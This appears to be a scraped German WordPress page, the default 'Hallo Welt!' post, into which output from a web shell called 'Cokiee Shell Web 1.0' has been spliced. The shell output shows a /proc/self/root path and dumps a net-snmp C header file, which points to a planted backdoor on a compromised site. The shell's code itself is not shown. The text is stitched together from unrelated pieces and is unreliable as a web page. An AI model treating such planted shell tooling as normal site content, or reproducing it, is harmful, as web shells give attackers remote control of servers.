Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /proc/self/root/usr/include/net-snmp/agent/ |
Current File : //proc/self/root/usr/include/net-snmp/agent/struct.h |
#ifndef UCD_SNMP_STRUCT #define UCD_SNMP_STRUCT #define STRMAX 1024 #define SHPROC 1 #define EXECPROC 2 #define PASSTHRU 3 #define PASSTHRU_PERSIST 4 #define MIBMAX 30 struct extensible { char name[STRMAX]; char command[STRMAX]; char fixcmd[STRMAX]; int type; int result; char output[STRMAX]; struct extensible *next; unsigned long miboid[MIBMAX]; size_t miblen; int pid; int tid; /* WIN32 thread */ }; struct myproc { char name[STRMAX]; char fixcmd[STRMAX]; int min; int max; struct myproc *next; }; /* * struct mibinfo * { * int numid; * unsigned long mibid[10]; * char *name; * void (*handle) (); * }; */ #endif
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare